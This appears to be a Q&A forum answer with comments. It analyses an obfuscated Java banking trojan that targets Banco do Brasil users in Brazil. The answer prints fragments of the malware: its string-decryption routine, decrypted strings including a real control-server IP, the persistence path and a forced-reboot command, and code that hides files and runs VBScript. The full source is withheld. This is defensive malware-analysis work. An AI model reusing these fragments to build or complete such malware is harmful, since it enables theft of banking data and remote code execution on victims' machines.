BE CAREFUL WHEN EXECUTING THIS CODE
THAT PROGRAM IS A VIRUS
What does he do:
Detects the Locale
and refuses to do anything if it does not detect that the operating system is configured as being in Brazil and in Portuguese or if the machine has already been infected (which it detects when searching for the file APPDATA/Sun/Java/Deployment/Sun.jar
).
Creates and executes vbscript scripts that run on system startup (folder "startup"
). After the installation is complete, one of these scripts will be executed whenever the user presses Ctrl+Alt+F.
Upload GPC files to IP 191.252.3.83. These files refer to the Gbplugin module, Banco do Brasil security and also used by other banks. It also sends information about your operating system, your hard drive serial and your IP to that same malicious destination. It first converts the data to a string of hexadecimal characters written backwards to make detection difficult.
Downloads files, compresses them (using the GZIP algorithm), puts them in hidden folders with random names inside the folder "APPDATA"
and executes them. It uses for these files the extensions ". mp3", ". jar", ". bat", ". wmv", ". xml" and ". pdf".
Reboots the machine forcibly, ensuring your system is compromised.
This code is overshadowed. The comment at the beginning makes it clear that it has been decompiled. The process of obfuscation messed up all the variable names, turning them into meaningless things. In addition, String values and constants are encrypted.
To unravel this tangle and find out what the code does, the first step is to rename the variables.
For example:
public static boolean GDDSSZZXXVVNNaabcceegghhjUOPPKKJJ(String pprrsuuxxzzwQQEETTYIIOOLLJJHHFFDDAAXCCCBBNaacddffgiggijjmmo) {
File ddffhhiillmmooqqXCBBaaac = new File(pprrsuuxxzzwQQEETTYIIOOLLJJHHFFDDAAXCCCBBNaacddffgiggijjmmo);
boolean wwWWEtttuxxyy = ddffhhiillmmooqqXCBBaaac.exists();
return wwWWEtttuxxyy;
}
That is the result:
public static boolean GDDSSZZXXVVNNaabcceegghhjUOPPKKJJ(String caminhoDoArquivo) {
File arquivo = new File(caminhoDoArquivo);
boolean existe = arquivo.exists();
return existe;
}
With this it becomes clear what this method does, and then we can rename it and simplify it:
public static boolean arquivoExiste(String caminhoDoArquivo) {
return new File(caminhoDoArquivo).exists();
}
And then you’ll do it with all the methods, one by one. As if it were a puzzle, where to solve a more complicated part you have to first solve a simpler one. And then, you start with the simplest methods to then make the most complicated.
There are some parts that do the encryption of other parts of the program. In particular these three methods are the most important:
public static String uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(int Nu) {
byte[] ZCCBNNaabbddfggiijjHHFFDDAZ = new byte[]{47, 56, 67, 66, 67, 47, 80, 75, 67, 83, 53, 97, 100, 100, 105, 110, 103, 85, 84, 70, 45, 68, 69, 80, 83, 105, 106, 109, 110, 112, 112, 114, 115, 115, 117, 117, 118, 118, 122, 122, 119, 81, 81, 69, 69, 82, 82, 89, 89, 73, 73, 79, 79, 76, 75, 75, 72, 72};
return new String(ZCCBNNaabbddfggiijjHHFFDDAZ, Nu, 1);
}
private static byte[] WWEETTYIIIPuuxxzzww(String HHFFDDAAZZCCBBNNaYIOOLLKK) {
byte[] jjmmooprrssuuxxzzwwQQETTYYIIOOLLJHHFFFDDAAXCCBBNbddffggi = new byte[HHFFDDAAZZCCBBNNaYIOOLLKK.length() / 2];
int i = 0;
while (i < jjmmooprrssuuxxzzwwQQETTYYIIOOLLJHHFFFDDAAXCCBBNbddffggi.length) {
String iillmmoopprrttuuxxzwwWWEETTYYIIPPLaacddffg = HHFFDDAAZZCCBBNNaYIOOLLKK.substring(2 * i, 2 * i + 2);
int XXCCBBaaaccddfhhiillmmooqqrrttuuxxyywwJHHFSSAA = Integer.parseInt(iillmmoopprrttuuxxzwwWWEETTYYIIPPLaacddffg, 16);
jjmmooprrssuuxxzzwwQQETTYYIIOOLLJHHFFFDDAAXCCBBNbddffggi[i] = (byte)XXCCBBaaaccddfhhiillmmooqqrrttuuxxyywwJHHFSSAA;
++i;
}
return jjmmooprrssuuxxzzwwQQETTYYIIOOLLJHHFFFDDAAXCCBBNbddffggi;
}
public static String SAAXXCCBBaaaccddfLJJHHFFS(String PPLLJJGGFFSSSAAXVVVBaaaacEETTUUII) throws Exception {
byte[] lnnoqqrrttvvxxyywwWWReefhhiil = Vegimmnp.WWEETTYIIIPuuxxzzww(PPLLJJGGFFSSSAAXVVVBaaaacEETTUUII);
Cipher KJJGGFFSSSZZXXVVBBaabcceeffhjjllnnoTTUUIPPK = Cipher.getInstance(String.valueOf(Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(21)) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(22) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(24) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(0) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(2) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(3) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(4) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(5) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(6) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(7) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(8) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(9) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(10) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(23) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(11) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(12) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(13) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(14) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(15) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(16));
DESKeySpec xyyQQWWRRTTUUOOPPKKJJGGDSSZZXXXVNNaabccqqsttvvx = new DESKeySpec(ggillmmooprrtNNaccddf.getBytes(String.valueOf(Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(17)) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(18) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(19) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(20) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(1)));
SecretKeyFactory nnpqqssttvzzyyQQWWRRYYUOOPegghjjll = SecretKeyFactory.getInstance(String.valueOf(Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(21)) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(22) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(24));
SecretKey SZZCCVKKHGGDDS = nnpqqssttvzzyyQQWWRRYYUOOPegghjjll.generateSecret(xyyQQWWRRTTUUOOPPKKJJGGDSSZZXXXVNNaabccqqsttvvx);
IvParameterSpec egghjjmmnnppqqsuuvvzzyyQQEERRYUUOOLLKHNaabbdde = new IvParameterSpec(ggillmmooprrtNNaccddf.getBytes(String.valueOf(Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(17)) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(18) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(19) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(20) + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(1)));
KJJGGFFSSSZZXXVVBBaabcceeffhjjllnnoTTUUIPPK.init(2, (Key)SZZCCVKKHGGDDS, egghjjmmnnppqqsuuvvzzyyQQEERRYUUOOLLKHNaabbdde);
byte[] CCVVNaabbdeeggiijjmnnpprrGGDDAAZZ = KJJGGFFSSSZZXXVVBBaabcceeffhjjllnnoTTUUIPPK.doFinal(lnnoqqrrttvvxxyywwWWReefhhiil);
return new String(CCVVNaabbdeeggiijjmnnpprrGGDDAAZZ);
}
What exactly does it do? This is the party responsible for decrypting many of the program’s secrets, which can be deduced by using classes such as SecretKey
, SecretKeyFactory
and Cipher
. You can use the debugger (Debugger) and some System.out.println
to understand what values are being manipulated by this method.
Also, the test I did below confirms that this serves to decrypt some things. For example, I did the following test with some of the encrypted strings in the program:
public static void main(String[] args) throws Exception {
System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("48b7bda975cc41e6716484a94b74cccccb6be918ad95414abfb3ca29acc894409d7118cedf6c560389bb72ec45f47a9de1d535737acf4db7"));
System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("c7ebe084d263c6a0"));
System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("8e44e85efe2cce2652e7cb552572cd96ca54a4fb172beb92f4ca05e9f8312239"));
System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("c9fdd6ece6b2278dfaad22350fb54187"));
System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("0763ff114133fb7e"));
System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("f97815b28e5a1bd5"));
System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("8b3a37900826a2005e5a4557a7c48821"));
System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("ae702fe2558f88239e0813851c07cb9b"));
System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("5afe0cfeed4375da9a8a61e3c8f54b357a9db2aebaf3df97bb6502bbeca5e5aebf3d48cfdf69e005"));
System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("4840f3430f6e49578c97693ce45fa1a28f5066451b7ed265"));
System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("beeb93a7429eff3305c986801a0df210"));
System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("75090231081454157b1d08e3c1f35afb8b4ead755bc7be5f"));
}
Here’s what he shows on the way out:
Set WshShell = WScript.CreateObject("WScript.Shell")
8
/Sun/Java/Deployment/Sun.jar
191.252.3.83
APPDATA
http
/pdf/jjgf.pdf
dos:hidden
shutdown -r -t 30 -c Atualizando...
ProgramFiles(X86)
\\AppBrad\\
cscript //NoLogo
So you could replace Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("c7ebe084d263c6a0")
for "8"
and Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("48b7bda975cc41e6716484a94b74cccccb6be918ad95414abfb3ca29acc894409d7118cedf6c560389bb72ec45f47a9de1d535737acf4db7")
for "Set WshShell = WScript.CreateObject(\"WScript.Shell\")"
and thus go on simplifying and decrypting the code. In the end, after decrypting everything, you can probably throw away these decryption methods.
There is a compilation problem regarding a line with a String.this
. I don’t know why the decompiler went wrong here, but I only put one null
in place to compile. When you de-merge several parts of the program, this should be clearer and then you repair this place.
EDIT: In this case, what should be in place of the String.this
is the second parameter of the method involving the anonymous class where the String.this
was placed (i.e., aabbceeghhjjllnnppqqsttvvzzyQQWWRYYUUOPPKKHHGSSZXXVVN
).
As explained above, this code is a virus. It handles files and commands in Vbscript. Moreover, it also produces Urls:
public static String vvzwwQEERRnpprrsuu() throws UnknownHostException {
String ZZCCBBNNaabKHHFFDDA = new String(InetAddress.getLocalHost().getHostName());
return ZZCCBBNNaabKHHFFDDA.toUpperCase();
}
And it also connects on the internet:
HttpURLConnection ZCCVVNNabbddeegiijjmnnpprrsuuvvzwwQQERRYYIIOOLLJJHHGGDDAA = (HttpURLConnection)vzyyQQEERRYYUOOLLKjmnqsuuv.openConnection();
It also runs other programs/instructions:
public static void WWEETYYIIPPLJJHHFFSSAAXXCCBaaaccdfttuuxzzw() throws Exception {
Runtime.getRuntime().exec(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("5afe0cfeed4375da9a8a61e3c8f54b357a9db2aebaf3df97bb6502bbeca5e5aebf3d48cfdf69e005"));
}
This is decrypted in:
public static void WWEETYYIIPPLJJHHFFSSAAXXCCBaaaccdfttuuxzzw() throws Exception {
Runtime.getRuntime().exec("shutdown -r -t 30 -c Atualizando...");
}
That is, force the reboot of the machine where it runs.
And also:
Process ywwWRRTTUUIPrrttvxxy = Runtime.getRuntime().exec(String.valueOf(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("75090231081454157b1d08e3c1f35afb8b4ead755bc7be5f")) + ttuxxzwwWWEETTYIIPPLLJJHHFFSSAAXCCBBaaaaclmoopprr.getPath());
That from there is decrypted as:
Process ywwWRRTTUUIPrrttvxxy = Runtime.getRuntime().exec(String.valueOf("cscript //NoLogo ")) + ttuxxzwwWWEETTYIIPPLLJJHHFFSSAAXCCBBaaaaclmoopprr.getPath());
That is, starts the execution of another program.
Changes attributes of files:
public static void jjllnooqsstbbcceffh(Path RRTTUUOOPvvxyyQWW) throws Exception {
Files.setAttribute(RRTTUUOOPvvxyyQWW, Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("ae702fe2558f88239e0813851c07cb9b"), true, new LinkOption[0]);
}
This is decrypted in:
public static void jjllnooqsstbbcceffh(Path RRTTUUOOPvvxyyQWW) throws Exception {
Files.setAttribute(RRTTUUOOPvvxyyQWW, "dos:hidden", true, new LinkOption[0]);
}
I mean, he hides files.
It also reads environment variables:
jjllnooqqsstvvxxyyQWWRRTTUOOPPKKJGGDDSSZbbcceffh = String.valueOf(System.getenv(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("4840f3430f6e49578c97693ce45fa1a28f5066451b7ed265"))) + Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("beeb93a7429eff3305c986801a0df210");
This is decrypted in:
jjllnooqqsstvvxxyyQWWRRTTUOOPPKKJGGDDSSZbbcceffh = String.valueOf(System.getenv("ProgramFiles(X86)")) + "\\AppBrad\\";
After a few hours of work, I finally finished releasing it and decrypting it completely, so I have a readable version of its code. However, I will not post it because it is something very dangerous. I just say that whoever did it is a complete asshole. The code also has some bad programming practices. Here are some of the nefarious things it does:
- Creates multiple files on the system.
- Scan the system for specific Gbplugin files, which is the security module of Banco do Brasil and send them over the internet.
- Hides files and folders.
- Connect to internet to upload and download.
- Download programs from the internet and run them.
- Creates and executes scripts in Vbscript.
- Read the environment variables.
- Forces the machine to reboot.
- Reads the serial number of the hard drive and sends it over the internet, along with your IP and operating system details.
- Creates a script that runs on system startup via a shortcut.
Also, the author of this clearly is making a great effort to try to hide the purpose of the code.
This code looks like you’ve been obfuscated and tried to reverse it. It belongs to you?
– user28595
This code was obtained by reverse engineering?
– Elexsandro Rangel dos Santos
I believe that kind of question is not in accordance with the terms of the community, I don’t think unraveling a code made by someone else (possibly setting up an intellectual property theft) should be answered.
– Lucas Queiroz Ribeiro
@Lucasqueirozribeiro It is not possible to say that it is identity theft or not. I’ve seen cases where a company ends up having to do this sort of thing in its own codes where the source was lost.
– Victor Stafusa
I deleted my comments because my answer already covers everything written on them.
– Victor Stafusa
@Victorstafusa So I used the word "Possibly", so it denotes that we might be helping someone do something wrong. (Since there is no context in the question it is difficult to know) I only warned because sometimes he himself doesn’t know what he’s doing and the consequences of something like this.
– Lucas Queiroz Ribeiro
@By the content of the code, I’d say it’s not intellectual property theft. I think the obfuscated code is actually a virus/malware. In this case, he also "may not know what he’s doing and the consequences of something like that," but for a completely different reason.
– Victor Stafusa
@Victorstafusa If the code wasn’t made by him, and he’s trying to use it, it could be intellectual property theft, regardless. I understand your intention to warn him, so that he does not execute the code, however, what if it really is malware and he is trying to complete it ? Your help would still be welcome ? Would that question still belong to the scope of Stackoverflow ? Just those points I wanted to raise, but I think it’s a matter of opinion :p
– Lucas Queiroz Ribeiro